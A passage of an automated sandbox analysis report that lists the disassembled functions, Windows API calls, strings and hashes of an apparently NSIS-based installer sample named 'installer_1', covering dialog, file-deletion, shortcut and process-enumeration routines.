Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

, xrefs: 00404F39
N, xrefs: 00404C06
M, xrefs: 00404B43
@, xrefs: 00404B90

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

@rD, xrefs: 00404610
A, xrefs: 00404636
@%F, xrefs: 00404674
82D, xrefs: 004046DB

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

GetTTFNameString, xrefs: 00406F07
name, xrefs: 00406FBF
%s: failed opening file "%s", xrefs: 00406F0C

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

\*.*, xrefs: 00406D03
Delete: DeleteFile failed("%s"), xrefs: 00406DFD
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
Delete: DeleteFile("%s"), xrefs: 00406DBC
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926
@%F, xrefs: 00406A53
@%F, xrefs: 0040682C
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

EnumProcessModules, xrefs: 0040648A
Module32FirstW, xrefs: 004065D3
Kernel32.DLL, xrefs: 0040659B
GetModuleBaseNameW, xrefs: 00406494
EnumProcesses, xrefs: 00406482
Process32NextW, xrefs: 004065C8
Process32FirstW, xrefs: 004065BD
Unknown, xrefs: 004064FC
PSAPI.DLL, xrefs: 00406464
CreateToolhelp32Snapshot, xrefs: 004065B5
Module32NextW, xrefs: 004065DE

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

